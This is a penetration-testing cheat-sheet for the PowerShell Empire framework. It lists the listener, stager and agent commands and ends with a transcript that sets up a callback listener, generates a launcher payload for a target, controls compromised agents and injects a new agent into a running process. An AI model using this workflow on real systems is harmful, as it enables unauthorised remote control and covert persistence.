PowerShell Empire is a post-exploitation and penetration testing framework: a Python server with stagers and agents based on PowerShell (and Python).
Do not use PowerShell Empire
PowerShell Empire is obsolete by modern standards: most EDR solutions now monitor PowerShell execution closely, so its PowerShell-based stagers and agents are readily detected.
Setup
Kali should already ship a working version. DO NOT upgrade it: upgrading changes the Python version and breaks the script.
If it no longer works, use the Docker image instead.
General
Tools
useTOOL : enter the TOOL context, e.g. uselistener, usestager, usemodule
useTOOL NAME : select a tool, e.g. uselistener http
info : show general info and options for the currently activated tool
set OPTION VALUE : set an option
execute : start the tool
back : leave the current context
Agents
agents : list active agents (compromised machines)
interact AGENT_NAME : interact with an agent / execute commands on it
sysinfo : display agent info
ps : list processes
psinject LISTENER PID : inject a new agent into the given PID, communicating over the given listener (the original agent keeps running; you have to switch to the newly created agent manually once the injection completes)
Types of Tools
Listener : handles incoming connections from payloads
Stager : generates the payload that launches an agent
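A complete run through the listener, stager and agent workflow described above, as an added illustrative transcript (not from the original page or from the Empire project). The listener name http1, the host address, the stager type windows/launcher_bat, the output path, the agent names and the PID are assumed placeholders; the exact prompt text and option names vary between Empire versions, so check them with info before setting anything.

```text
(Empire) > uselistener http
(Empire: listeners/http) > info                  # lists Name, Host, Port, ... with their defaults
(Empire: listeners/http) > set Name http1
(Empire: listeners/http) > set Host http://10.0.0.5:8080
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute               # listener now waits for callbacks
(Empire: listeners/http) > back

(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http1
(Empire: stager/windows/launcher_bat) > set OutFile /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) > execute  # writes the payload; deliver and run it on the target
(Empire: stager/windows/launcher_bat) > back

(Empire) > agents                                # the new agent appears once the payload calls back
(Empire: agents) > interact A1B2C3D4
(Empire: A1B2C3D4) > sysinfo
(Empire: A1B2C3D4) > ps                          # pick a long-lived process, e.g. explorer.exe
(Empire: A1B2C3D4) > psinject http1 2468         # a second agent is spawned inside PID 2468
(Empire: A1B2C3D4) > back
(Empire: agents) > agents                        # both agents are listed now
(Empire: agents) > interact E5F6G7H8             # switch to the injected agent manually; A1B2C3D4 stays alive
```

The switch after psinject is the step people forget: Empire does not move your session into the injected process, it only starts an additional agent there, so you keep working in the old agent until you interact with the new one.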